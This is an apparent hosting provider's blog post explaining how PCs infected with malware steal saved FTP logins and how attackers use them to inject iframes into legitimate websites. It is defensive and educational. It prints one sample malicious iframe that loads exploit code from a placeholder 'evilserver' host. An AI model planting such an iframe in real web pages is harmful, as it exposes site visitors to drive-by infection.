The Anatomy of a malware-zombie network and how it affects your website & everyone! (Part I)

Remember the “This site may harm your computer” warning message that you
came across on Google when you were searching for something which looked
like this…

…or the warning shown on FireFox/Chrome which looked like this:

…or your anti-virus software alerting you that a threat has been detected
when accessing a certain website?

If it happens to be your website then your website is the victim of a
malware attack where malicious codes are injected in your web pages.
According to a 2009 Websense report (link),
77% of Web sites with malicious code are legitimate websites that have been
compromised. It also recorded a “671% growth in the number of malicious
websites detected in 2008 – 2009″.

Who makes malware and why do they?

Malware is created by hackers or groups of hackers who intentionally do it

for their own interests. These viruses/malwares can be designed to illegally

use a PCs resources without the knowledge of the user to steal data

including bank accounts, credit cards, passwords, etc.; launch distributed
network attacks (like DDoS) on other servers; obtrusively advertise products
or services in the form of pop-up ads; send spam; etc. Your PC becomes a
“zombie” and spreads the infection into other PCs and becomes part of the
cycle called a “zombie network”. This allows the master of the “zombie
network” to access resources of all infected computers and use them to their
own benefits. There are even “Software as a Service” (SaaS) type websites
that offer automated solutions for anyone who want to inject several
websites with iframe codes as reported in this news article (link) which is indeed shocking.

How will my website be affected when my PC is infected?

95% of the malware attacks occur via FTP where a malicious code (an iframe
usually) is injected into the website files. The hackers/attackers may even
upload malicious files for other evil activities. So once the virus in your
PC steals the FTP login details from your PC anything can happen with
disastrous results.

The virus in your PC can retrieve your FTP login details without your
knowledge and that is normally done using a couple of methods:

1) When you save your FTP login in your FTP client software (e.g. Filezilla,
CuteFTP, etc.), the virus in your PC can decrypt the logins stored in the
FTP client software data file and it sends the login details to a master
(evil) server which is then distributed to others (hackers) for uploading
the malicious codes on their request.

2) The virus in your PC could be key-logging or sniffing your FTP (or even a
control panel) traffic and would steal those information to the master
server, all without your knowledge.

What does the malicious code contain?

The malware is designed to do specific functions when the unsuspecting
visitor to your legitimate website access it on their browser. The most
popular malicious codes are iframe codes so that the code would execute
along with your web page in the background. The iframe code would probably
execute a link to the malicious file which is hosted on another remote
server and is downloaded through the unsuspecting visitor’s browser to their
PC and the cycle continues as that PC has become part of the zombie network
now.

Typical iframe code: < iframe src=evilserver.tld/getexploits.php border=0 >

In the above example, when getexploits.php is triggered through the browser
it may use vulnerabilities in the browser to exploit it.

What else can happen to the website when my FTP login is compromised?

Since the hackers are now able to upload files to your account through FTP,
other than injecting malicious codes to files they may even upload spamming
scripts to send spam emails from your server, they may upload DoS scripts to
launch distributed attacks on other servers, run IRC bots which can result
in extremely high bandwidth usage, etc. As a result of the malicious
activity your website will start losing traffic as search engines and
browsers will block your website and result in lower search engine ranking
and gets blacklisted as well. It just doesn’t matter how big or small your
website is and how malicious the hack is – this is the sort of relationship where malware (hackers) always win and legitimate websites always lose.
How can I safe guard my PC to prevent FTP login theft?

This will be extensively discussed in the next part of this security special
blog series, please stay tuned!

-
Arun
System Administrator
Future Hosting, LLC